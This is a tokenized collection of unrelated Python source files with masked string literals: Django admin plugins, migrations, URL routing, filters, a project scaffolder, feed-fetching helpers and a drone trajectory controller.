'<STR_LIT:name>' : _ ( u"<STR_LIT>" ) , '<STR_LIT:description>' : _ ( <EOL> u"<STR_LIT>" ) , '<STR_LIT>' : self . default_theme } , <EOL> { '<STR_LIT:name>' : _ ( u"<STR_LIT>" ) , '<STR_LIT:description>' : _ ( u"<STR_LIT>" ) , <EOL> '<STR_LIT>' : self . bootstrap2_theme } ] <EOL> select_css = context . get ( '<STR_LIT>' , self . default_theme ) <EOL> if self . user_themes : <EOL> themes . extend ( self . user_themes ) <EOL> if self . use_bootswatch : <EOL> ex_themes = cache . get ( THEME_CACHE_KEY ) <EOL> if ex_themes : <EOL> themes . extend ( json . 
loads ( ex_themes ) ) <EOL> else : <EOL> ex_themes = [ ] <EOL> try : <EOL> h = httplib2 . Http ( ) <EOL> resp , content = h . request ( "<STR_LIT>" , '<STR_LIT:GET>' , "<STR_LIT>" , headers = { "<STR_LIT>" : "<STR_LIT:application/json>" , "<STR_LIT>" : self . request . META [ '<STR_LIT>' ] } ) <EOL> watch_themes = json . loads ( content ) [ '<STR_LIT>' ] <EOL> ex_themes . extend ( [ <EOL> { '<STR_LIT:name>' : t [ '<STR_LIT:name>' ] , '<STR_LIT:description>' : t [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : t [ '<STR_LIT>' ] , '<STR_LIT>' : t [ '<STR_LIT>' ] } <EOL> for t in watch_themes ] ) <EOL> except Exception , e : <EOL> print e <EOL> cache . set ( THEME_CACHE_KEY , json . dumps ( ex_themes ) , <NUM_LIT> * <NUM_LIT> ) <EOL> themes . extend ( ex_themes ) <EOL> nodes . append ( loader . render_to_string ( '<STR_LIT>' , { '<STR_LIT>' : themes , '<STR_LIT>' : select_css } ) ) <EOL> site . register_plugin ( ThemePlugin , BaseAdminView ) </s>
<s> import urllib <EOL> import io <EOL> from PIL import Image <EOL> from StringIO import StringIO <EOL> def get_image_size ( url ) : <EOL> try : <EOL> if url . startswith ( '<STR_LIT:http>' ) : <EOL> fd = urllib . urlopen ( url ) <EOL> url = io . BytesIO ( fd . read ( ) ) <EOL> im = Image . open ( url ) <EOL> return im . size <EOL> except Exception , e : <EOL> return None </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import django . utils . timezone <EOL> import django . core . validators <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:password>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT:password>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:username>' , models . CharField ( help_text = '<STR_LIT>' , unique = True , max_length = <NUM_LIT:30> , verbose_name = '<STR_LIT:username>' , validators = [ django . core . validators . RegexValidator ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:30> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:30> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT:email>' , models . EmailField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . 
URLField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_query_name = '<STR_LIT:user>' , related_name = '<STR_LIT>' , to = '<STR_LIT>' , blank = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_query_name = '<STR_LIT:user>' , related_name = '<STR_LIT>' , to = '<STR_LIT>' , blank = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT:user>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> import warnings <EOL> from django . conf import settings <EOL> from django . conf . urls import patterns <EOL> from django . utils import six <EOL> from . urlresolvers import SolidLocaleRegexURLResolver <EOL> def solid_i18n_patterns ( prefix , * args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( prefix , six . string_types ) : <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> PendingDeprecationWarning , stacklevel = <NUM_LIT:2> <EOL> ) <EOL> pattern_list = patterns ( prefix , * args ) <EOL> else : <EOL> pattern_list = [ prefix ] + list ( args ) <EOL> if not settings . USE_I18N : <EOL> return pattern_list <EOL> return [ SolidLocaleRegexURLResolver ( pattern_list ) ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . DeleteModel ( <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ] </s>
<s> from django . conf . urls import include , url <EOL> from rest_framework import routers <EOL> from . import api <EOL> model_router = routers . SimpleRouter ( ) <EOL> model_router . register ( r'<STR_LIT>' , <EOL> api . FormulaModelUserPermissionsViewSet , <EOL> '<STR_LIT>' ) <EOL> model_router . register ( r'<STR_LIT>' , <EOL> api . FormulaModelGroupPermissionsViewSet , <EOL> '<STR_LIT>' ) <EOL> object_router = routers . SimpleRouter ( ) <EOL> object_router . register ( r'<STR_LIT>' , <EOL> api . FormulaObjectUserPermissionsViewSet , <EOL> '<STR_LIT>' ) <EOL> object_router . register ( r'<STR_LIT>' , <EOL> api . FormulaObjectGroupPermissionsViewSet , <EOL> '<STR_LIT>' ) <EOL> urlpatterns = ( <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaListAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> include ( model_router . urls ) ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaDetailAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaPropertiesAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaComponentListAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaValidVersionListAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> api . FormulaActionAPIView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> include ( object_router . urls ) ) , <EOL> ) </s>
<s> import django_filters <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . auth . models import Group <EOL> from stackdio . core . filters import OrFieldsFilter <EOL> class UserFilter ( django_filters . FilterSet ) : <EOL> username = django_filters . CharFilter ( lookup_type = '<STR_LIT>' ) <EOL> first_name = django_filters . CharFilter ( lookup_type = '<STR_LIT>' ) <EOL> last_name = django_filters . CharFilter ( lookup_type = '<STR_LIT>' ) <EOL> q = OrFieldsFilter ( field_names = ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' ) , <EOL> lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = get_user_model ( ) <EOL> fields = ( <EOL> '<STR_LIT:username>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:q>' , <EOL> ) <EOL> class GroupFilter ( django_filters . FilterSet ) : <EOL> name = django_filters . CharFilter ( lookup_type = '<STR_LIT>' ) <EOL> q = OrFieldsFilter ( field_names = ( '<STR_LIT:name>' , ) , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = Group <EOL> fields = ( <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT:q>' , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT:label>' , <EOL> name = '<STR_LIT:value>' , <EOL> field = models . CharField ( max_length = <NUM_LIT:255> , null = True , verbose_name = b'<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> from stackdio . server . settings . base import * <EOL> REST_FRAMEWORK [ '<STR_LIT>' ] = '<STR_LIT>' </s>
<s> import logging <EOL> import os <EOL> import shutil <EOL> import yaml <EOL> from stackstrap . jinja import JinjaInterface <EOL> class ProjectException ( Exception ) : <EOL> pass <EOL> class Project ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . log = logging . getLogger ( "<STR_LIT>" ) <EOL> self . name = name <EOL> self . short_name = self . name <EOL> def create ( self , template ) : <EOL> if os . path . exists ( self . name ) : <EOL> raise ProjectException ( <EOL> "<STR_LIT>" . format ( <EOL> name = self . name <EOL> ) ) <EOL> if not template . validated : <EOL> template . validate ( ) <EOL> self . log . info ( <EOL> ( <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) . format ( <EOL> name = self . name , <EOL> template = template . name <EOL> ) ) <EOL> template . copy_to ( self . name ) <EOL> render_context = { <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT>' : template , <EOL> } <EOL> jinja = JinjaInterface ( <EOL> globals = render_context , <EOL> file_loader_paths = [ os . path . abspath ( self . name ) ] <EOL> ) <EOL> def path ( * parts ) : <EOL> return os . path . abspath ( os . path . join ( self . name , * parts ) ) <EOL> def render_in_place ( * parts ) : <EOL> source = path ( * parts ) <EOL> data = unicode ( open ( source ) . read ( ) , "<STR_LIT:utf8>" ) <EOL> with open ( source , '<STR_LIT:w>' ) as f : <EOL> f . write ( jinja . render_string ( data ) ) <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> metadata = yaml . load ( jinja . render_file ( '<STR_LIT>' ) ) <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> cleanup_paths = metadata . get ( "<STR_LIT>" , [ ] ) <EOL> for p in cleanup_paths : <EOL> self . log . debug ( p ) <EOL> cleanup_path = path ( p ) <EOL> if os . path . isdir ( cleanup_path ) : <EOL> shutil . rmtree ( cleanup_path ) <EOL> elif os . path . exists ( cleanup_path ) : <EOL> os . remove ( cleanup_path ) <EOL> else : <EOL> self . log . error ( "<STR_LIT>" % cleanup_path ) <EOL> self . log . 
debug ( "<STR_LIT>" ) <EOL> file_template_paths = metadata . get ( "<STR_LIT>" , [ ] ) <EOL> for p in file_template_paths : <EOL> self . log . debug ( p ) <EOL> render_in_place ( p ) <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> path_templates = metadata . get ( "<STR_LIT>" , [ ] ) <EOL> for path_template in path_templates : <EOL> for orig_path in path_template : <EOL> self . log . debug ( <EOL> "<STR_LIT>" % ( orig_path , path_template [ orig_path ] ) <EOL> ) <EOL> os . rename ( path ( orig_path ) , <EOL> path ( path_template [ orig_path ] ) ) <EOL> self . log . info ( "<STR_LIT>" . format ( <EOL> name = self . name <EOL> ) ) </s>
<s> import six <EOL> from . import ConfigSource <EOL> import inspect <EOL> class PyFile ( ConfigSource ) : <EOL> def __init__ ( self , pyfilename = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( PyFile , self ) . __init__ ( ** kwargs ) <EOL> self . source = Subsection ( ) <EOL> if pyfilename : <EOL> with open ( pyfilename ) as fp : <EOL> pycode = compile ( fp . read ( ) , pyfilename , '<STR_LIT>' ) <EOL> six . exec_ ( pycode , globals ( ) , self . source ) <EOL> elif kwargs . get ( '<STR_LIT>' ) : <EOL> self . source = kwargs [ '<STR_LIT>' ] <EOL> def has ( self , key ) : <EOL> return key in self . source and not isinstance ( key , Subsection ) <EOL> def get ( self , key ) : <EOL> return self . source . get ( key ) <EOL> def keys ( self ) : <EOL> for key , val in self . source . items ( ) : <EOL> if not ( isinstance ( val , Subsection ) or <EOL> inspect . ismodule ( val ) or <EOL> inspect . isfunction ( val ) or <EOL> val . __class__ . __module__ in ( '<STR_LIT>' ) ) : <EOL> yield key <EOL> def subsections ( self ) : <EOL> return [ key for key in self . source . keys ( ) if isinstance ( self . source [ key ] , Subsection ) ] <EOL> def subsection ( self , key ) : <EOL> return PyFile ( pyfilename = None , dict = self . source . get ( key ) ) <EOL> def set ( self , key , value ) : <EOL> return ValueError ( "<STR_LIT>" ) <EOL> def typed ( self , key ) : <EOL> return self . has ( key ) <EOL> class Subsection ( dict ) : <EOL> def __setattr__ ( self , key , value ) : <EOL> self [ key ] = value <EOL> def __getattr__ ( self , key ) : <EOL> return self [ key ] </s>
<s> """<STR_LIT>""" <EOL> from core . common import retrieve_content <EOL> __url__ = "<STR_LIT>" <EOL> __check__ = "<STR_LIT>" <EOL> __reference__ = "<STR_LIT>" <EOL> def fetch ( ) : <EOL> retval = { } <EOL> content = retrieve_content ( __url__ ) <EOL> if __check__ in content : <EOL> for line in content . split ( '<STR_LIT:\n>' ) : <EOL> line = line . strip ( ) <EOL> if not line or line . startswith ( '<STR_LIT:#>' ) or '<STR_LIT:.>' not in line or "<STR_LIT>" in line : <EOL> continue <EOL> line = line . lower ( ) <EOL> if "<STR_LIT>" in line : <EOL> info = "<STR_LIT>" <EOL> elif "<STR_LIT>" in line : <EOL> info = "<STR_LIT>" <EOL> elif any ( _ in line for _ in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> info = "<STR_LIT>" <EOL> else : <EOL> info = "<STR_LIT>" <EOL> retval [ line . split ( "<STR_LIT:U+002C>" ) [ <NUM_LIT:0> ] ] = ( info , __reference__ ) <EOL> return retval </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from core . common import retrieve_content <EOL> __url__ = "<STR_LIT>" <EOL> __check__ = "<STR_LIT>" <EOL> __info__ = "<STR_LIT>" <EOL> __reference__ = "<STR_LIT>" <EOL> def fetch ( ) : <EOL> retval = { } <EOL> content = retrieve_content ( __url__ ) <EOL> if __check__ in content : <EOL> for match in re . finditer ( r"<STR_LIT>" , content ) : <EOL> retval [ match . group ( <NUM_LIT:1> ) ] = ( __info__ , __reference__ ) <EOL> return retval </s>
<s> """<STR_LIT>""" <EOL> from core . common import retrieve_content <EOL> __url__ = "<STR_LIT>" <EOL> __check__ = "<STR_LIT>" <EOL> __info__ = "<STR_LIT>" <EOL> __reference__ = "<STR_LIT>" <EOL> def fetch ( ) : <EOL> retval = { } <EOL> content = retrieve_content ( __url__ ) <EOL> if __check__ in content : <EOL> for line in content . split ( '<STR_LIT:\n>' ) : <EOL> line = line . strip ( ) <EOL> if not line or line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> retval [ line ] = ( __info__ , __reference__ ) <EOL> return retval </s>
<s> import time <EOL> import os , sys , inspect <EOL> from pylab import * <EOL> import numpy <EOL> import scipy . interpolate <EOL> from droneapi . lib import APIException , Vehicle , Attitude , Location , GPSInfo , VehicleMode , Mission , Parameters , Command , CommandSequence <EOL> from pymavlink import mavutil <EOL> cmd_subfolder = os . path . realpath ( os . path . abspath ( os . path . join ( os . path . split ( inspect . getfile ( inspect . currentframe ( ) ) ) [ <NUM_LIT:0> ] , "<STR_LIT>" ) ) ) <EOL> if cmd_subfolder not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , cmd_subfolder ) <EOL> import trajectoryAPI <EOL> import coord_system <EOL> TAKEOFF_HEIGHT = <NUM_LIT> <EOL> DISTANCE_LIMIT_LOOK_AT_METERS = <NUM_LIT:1.0> <EOL> DISTANCE_LIMIT_LOOK_FROM_METERS = <NUM_LIT:1.0> <EOL> def init_splinefollow ( drone ) : <EOL> drone . states = { <EOL> '<STR_LIT>' : _state_waiting , <EOL> '<STR_LIT>' : _state_flyToStart , <EOL> '<STR_LIT>' : _state_flySpline , <EOL> } <EOL> drone . lastLookFromPoint = None <EOL> drone . lastLookAtPoint = None <EOL> drone . altitudeOffset = <NUM_LIT:0> <EOL> drone . current_location = None <EOL> drone . vehicle . add_attribute_observer ( '<STR_LIT:location>' , drone . location_callback ) <EOL> def setSpline ( drone , data ) : <EOL> lookAtN = data [ '<STR_LIT>' ] <EOL> lookAtE = data [ '<STR_LIT>' ] <EOL> lookAtD = data [ '<STR_LIT>' ] <EOL> lookFromN = data [ '<STR_LIT>' ] <EOL> lookFromE = data [ '<STR_LIT>' ] <EOL> lookFromD = data [ '<STR_LIT>' ] <EOL> drone . P_lookFromNED_spline = c_ [ lookFromN , lookFromE , lookFromD ] <EOL> drone . T_lookFromNED_spline = c_ [ data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ] <EOL> drone . P_lookFromNED_ease = c_ [ array ( data [ '<STR_LIT>' ] ) ] <EOL> drone . T_lookFromNED_ease = c_ [ array ( data [ '<STR_LIT>' ] ) ] <EOL> drone . P_lookAtNED_spline = c_ [ lookAtN , lookAtE , lookAtD ] <EOL> drone . 
T_lookAtNED_spline = c_ [ data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ] <EOL> drone . P_lookAtNED_ease = c_ [ array ( data [ '<STR_LIT>' ] ) ] <EOL> drone . T_lookAtNED_ease = c_ [ array ( data [ '<STR_LIT>' ] ) ] <EOL> drone . startAltitude = data [ '<STR_LIT>' ] <EOL> drone . lastTime = data [ '<STR_LIT>' ] ; <EOL> drone . refLLH = array ( [ data [ '<STR_LIT>' ] [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] ) <EOL> def newTrajectory ( drone , data ) : <EOL> setSpline ( drone , data ) <EOL> drone . lastLookFromPoint = None <EOL> drone . lastLookAtPoint = None <EOL> drone . altitudeOffset = <NUM_LIT:0> <EOL> drone . vehicle . add_attribute_observer ( '<STR_LIT:location>' , drone . location_callback ) <EOL> configureSpline ( drone ) <EOL> def changeCurrentTrajectory ( drone , data ) : <EOL> setSpline ( drone , data ) <EOL> configureSpline ( drone ) <EOL> def _stateTransition ( drone , newState ) : <EOL> print "<STR_LIT>" % ( drone . STATE , newState ) <EOL> drone . currentStateTime = time . time ( ) <EOL> drone . STATE = newState <EOL> def start ( drone ) : <EOL> if not drone . vehicle . armed : <EOL> print "<STR_LIT>" <EOL> drone . vehicle . armed = True <EOL> drone . vehicle . flush ( ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> print "<STR_LIT>" <EOL> drone . vehicle . mode = VehicleMode ( "<STR_LIT>" ) <EOL> drone . vehicle . flush ( ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> TAKEOFF_HEIGHT = drone . refLLH [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> print "<STR_LIT>" % TAKEOFF_HEIGHT <EOL> drone . vehicle . commands . takeoff ( TAKEOFF_HEIGHT ) <EOL> drone . vehicle . flush ( ) <EOL> while drone . vehicle . location . alt < TAKEOFF_HEIGHT - <NUM_LIT:1> : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> print "<STR_LIT>" <EOL> drone . vehicle . mode = VehicleMode ( "<STR_LIT>" ) <EOL> drone . vehicle . flush ( ) <EOL> time . 
sleep ( <NUM_LIT:2> ) <EOL> _stateTransition ( drone , '<STR_LIT>' ) <EOL> def _state_waiting ( drone , elapsed , dt ) : <EOL> drone . flightFinished ( ) <EOL> return <EOL> def _state_flyToStart ( drone , elapsed , dt ) : <EOL> l = drone . vehicle . location <EOL> if l is None : <EOL> return <EOL> lookFromStartLLH = coord_system . ned2llh ( drone . P_lookFromNED_spline [ <NUM_LIT:0> ] , drone . refLLH ) <EOL> lookAtStartLLH = coord_system . ned2llh ( drone . P_lookAtNED_spline [ <NUM_LIT:0> ] , drone . refLLH ) <EOL> lookFromStartLLH [ <NUM_LIT:2> ] = lookFromStartLLH [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> lookAtStartLLH [ <NUM_LIT:2> ] = lookFromStartLLH [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> distanceToStart = coord_system . get_distance_llh ( lookFromStartLLH , numpy . array ( [ l . lat , l . lon , l . alt ] ) ) <EOL> print "<STR_LIT>" % distanceToStart <EOL> if distanceToStart > <NUM_LIT> or np . linalg . norm ( drone . vehicle . velocity ) > <NUM_LIT:0.5> : <EOL> sendLookFrom ( drone , lookFromStartLLH ) <EOL> sendLookAt ( drone , lookAtStartLLH ) <EOL> else : <EOL> return _stateTransition ( drone , '<STR_LIT>' ) <EOL> def _state_flySpline ( drone , elapsed , dt ) : <EOL> if elapsed > drone . lastTime : <EOL> return _stateTransition ( drone , '<STR_LIT>' ) <EOL> t_lookAt = drone . time_to_lookAt ( elapsed ) <EOL> t_lookFrom = drone . time_to_lookFrom ( elapsed ) <EOL> lookFromPointNED , TF , dTF = trajectoryAPI . _evaluate_spatial_spline ( drone . C_lookFrom_spline , drone . T_lookFrom_spline , drone . sd_lookFrom_spline , T_eval = np . array ( [ [ t_lookFrom , t_lookFrom , t_lookFrom ] ] ) ) <EOL> lookAtPointNED , TA , dTA = trajectoryAPI . _evaluate_spatial_spline ( drone . C_lookAt_spline , drone . T_lookAt_spline , drone . sd_lookAt_spline , T_eval = np . array ( [ [ t_lookAt , t_lookAt , t_lookAt ] ] ) ) <EOL> lookFromPoint = coord_system . ned2llh ( lookFromPointNED [ <NUM_LIT:0> ] , drone . refLLH ) <EOL> lookAtPoint = coord_system . 
ned2llh ( lookAtPointNED [ <NUM_LIT:0> ] , drone . refLLH ) <EOL> lookFromPoint [ <NUM_LIT:2> ] = lookFromPoint [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> lookAtPoint [ <NUM_LIT:2> ] = lookAtPoint [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> sendLookFrom ( drone , lookFromPoint ) <EOL> if drone . lastLookAtPoint == None or coord_system . get_distance_llh ( drone . lastLookAtPoint , lookAtPoint ) > DISTANCE_LIMIT_LOOK_AT_METERS : <EOL> drone . lastLookAtPoint = lookAtPoint <EOL> sendLookAt ( drone , lookAtPoint ) <EOL> def armed_callback ( drone , armed ) : <EOL> print "<STR_LIT>" % armed <EOL> def configureSpline ( drone ) : <EOL> C_lookFromNED_spline , T_lookFrom2_spline , sd_lF = trajectoryAPI . _get_spatial_spline_coefficients ( drone . P_lookFromNED_spline , drone . T_lookFromNED_spline ) <EOL> C_lookAtNED_spline , T_lookAt2_spline , sd_lA = trajectoryAPI . _get_spatial_spline_coefficients ( drone . P_lookAtNED_spline , drone . T_lookAtNED_spline ) <EOL> T_linspace_norm_lookAt , T_user_progress_lookAt , P_user_progress_lookAt , ref_llh1 = trajectoryAPI . reparameterize_spline ( drone . P_lookAtNED_spline , drone . T_lookAtNED_spline , drone . P_lookAtNED_ease , drone . T_lookAtNED_ease ) <EOL> T_linspace_norm_cameraPose , T_user_progress_lookFrom , P_user_progress_lookFrom , ref_llh2 = trajectoryAPI . reparameterize_spline ( drone . P_lookFromNED_spline , drone . T_lookFromNED_spline , drone . P_lookFromNED_ease , drone . T_lookFromNED_ease ) <EOL> timeMaxT = drone . lastTime <EOL> lookAtMaxT = drone . T_lookAtNED_spline [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> lookFromMaxT = drone . T_lookFromNED_spline [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> drone . altitudeOffset = drone . startAltitude <EOL> drone . C_lookFrom_spline = C_lookFromNED_spline <EOL> drone . T_lookFrom_spline = drone . T_lookFromNED_spline <EOL> drone . sd_lookFrom_spline = sd_lF <EOL> drone . C_lookAt_spline = C_lookAtNED_spline <EOL> drone . T_lookAt_spline = drone . 
T_lookAtNED_spline <EOL> drone . sd_lookAt_spline = sd_lA <EOL> drone . reparameterizedTime = T_linspace_norm_lookAt * timeMaxT <EOL> drone . lookAtReparameterizedT = T_user_progress_lookAt * lookAtMaxT <EOL> drone . lookFromReparameterizedT = T_user_progress_lookFrom * lookFromMaxT <EOL> drone . time_to_lookFrom = scipy . interpolate . interp1d ( drone . reparameterizedTime , drone . lookFromReparameterizedT ) <EOL> drone . time_to_lookAt = scipy . interpolate . interp1d ( drone . reparameterizedTime , drone . lookAtReparameterizedT ) <EOL> def sendLookAt ( drone , llh , vel = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) : <EOL> msg = drone . vehicle . message_factory . command_long_encode ( <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <EOL> mavutil . mavlink . MAV_CMD_DO_SET_ROI , <EOL> <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> llh [ <NUM_LIT:0> ] , <EOL> llh [ <NUM_LIT:1> ] , <EOL> llh [ <NUM_LIT:2> ] <EOL> ) <EOL> drone . vehicle . send_mavlink ( msg ) <EOL> def sendLookFrom ( drone , llh , vel = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) : <EOL> print "<STR_LIT>" <EOL> dest = Location ( llh [ <NUM_LIT:0> ] , llh [ <NUM_LIT:1> ] , llh [ <NUM_LIT:2> ] , is_relative = False ) <EOL> drone . vehicle . commands . goto ( dest ) </s>
<s> COMMON = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> } <EOL> READ_PAGE_DATA = [ { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:200> } , <EOL> { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } , <EOL> { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : False } ] <EOL> INPUT_WORDS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , <EOL> u'<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ u'<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , <EOL> u'<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> } <EOL> MISSPELLED_WORDS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ u'<STR_LIT>' <EOL> '<STR_LIT>' ] <EOL> } <EOL> } </s>
